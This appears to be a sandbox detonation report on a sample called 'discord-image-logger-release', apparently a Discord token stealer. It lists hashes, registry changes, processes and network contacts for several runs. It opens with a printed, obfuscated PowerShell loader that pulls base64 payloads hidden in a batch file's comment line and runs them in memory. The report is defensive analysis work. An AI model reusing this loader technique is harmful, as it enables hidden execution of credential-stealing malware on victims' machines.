$JMgSB.Dispose(); $DbpkU.Dispose(); $qZtjl.Dispose(); $qZtjl.ToArray();}function ZkZVP($DITIA,$AoxAJ){ $HLgZK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$DITIA); $UXpIZ=$HLgZK.EntryPoint; $UXpIZ.Invoke($null, $AoxAJ);}$zVdRm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat').Split([Environment]::NewLine);foreach ($BYfmw in $zVdRm) { if ($BYfmw.StartsWith(':: ')) { $Rndkm=$BYfmw.Substring(3); break; }}$FMGlq=[string[]]$Rndkm.Split('\');$IgKIL=kOuIB (iwkhR ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($FMGlq[0])));$voFjb=kOuIB (iwkhR ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($FMGlq[1])));ZkZVP $voFjb (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));ZkZVP $IgKIL (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

Network

N/A

Files

\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe

MD5 852d67a27e454bd389fa7f02a8cbe23f
SHA1 5330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256 a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

memory/1968-7-0x000007FEF5F1E000-0x000007FEF5F1F000-memory.dmp

memory/1968-8-0x000000001B4C0000-0x000000001B7A2000-memory.dmp

memory/1968-9-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp

memory/1968-10-0x0000000001D10000-0x0000000001D18000-memory.dmp

memory/1968-12-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp

memory/1968-11-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp

memory/1968-13-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp

memory/1968-14-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2025-02-24 04:13

Reported

2025-02-24 04:15

Platform

win7-20240903-en

Max time kernel

120s

Max time network

125s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\discordtoken.py

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\discordtoken.py

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\discordtoken.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\discordtoken.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 22e49b9f984b5f8c93f4d9f5a157ec83
SHA1 dd20a0365bf6f92bf314bb3ec5f2cafd1c71a2bc
SHA256 c9a1398a4e5390c1bc41e6cc1ec2c0bc56a5567e81c9c4e7cd87c799b5456f33
SHA512 88b93990a46837759a8a579d1ad59c4ffecc9ff8590bb0eda0a0a61685a9638a2475e42d792e2aea50a559dc66b75045397fe61cdb76b5df885ad66e68cbb897

Analysis: behavioral8

Detonation Overview

Submitted

2025-02-24 04:13

Reported

2025-02-24 04:15

Platform

win10v2004-20250217-en

Max time kernel

94s

Max time network

145s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\discordtoken.py

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\discordtoken.py

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2025-02-24 04:13

Reported

2025-02-24 04:15

Platform

win10v2004-20250217-en

Max time kernel

94s

Max time network

129s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\injection.py

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\injection.py

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2025-02-24 04:13

Reported

2025-02-24 04:15

Platform

win10v2004-20250217-en

Max time kernel

92s

Max time network

130s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\startup.py

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\startup.py

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2025-02-24 04:13

Reported

2025-02-24 04:15

Platform

win10v2004-20250217-en

Max time kernel

148s

Max time network

150s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\systeminfo.py

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\systeminfo.py

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2025-02-24 04:13

Reported

2025-02-24 04:15

Platform

win10v2004-20250217-en

Max time kernel

91s

Max time network

150s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\config.py

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\config.py

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2025-02-24 04:13

Reported

2025-02-24 04:15

Platform

win7-20240903-en

Max time kernel

121s

Max time network

127s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\main.py

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\main.py

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\main.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\main.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 d13b10193fc5325a324553bd5b2f758f
SHA1 7cc11c8b658c72cfb37befe8dcdbee47143d24d7
SHA256 7d7e519c1b253714a12aff619ab1bce9bc2837e24e3c9c3e20aacd57c55a094e
SHA512 b4442303c79ece053587ec3b37cf8a71567d27f31d7f77660ae6265f88faf99c39c1008a6e26bd81082580870eb3d67bbf43a1dce1e5b38fc4261f896acc0f87

Analysis: behavioral4

Detonation Overview

Submitted

2025-02-24 04:13

Reported

2025-02-24 04:15

Platform

win10v2004-20250217-en

Max time kernel

149s

Max time network

150s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\antidebug.py

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\antidebug.py

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
GB 2.18.66.169:443 www.bing.com tcp
US 8.8.8.8:53 udp

Files

N/A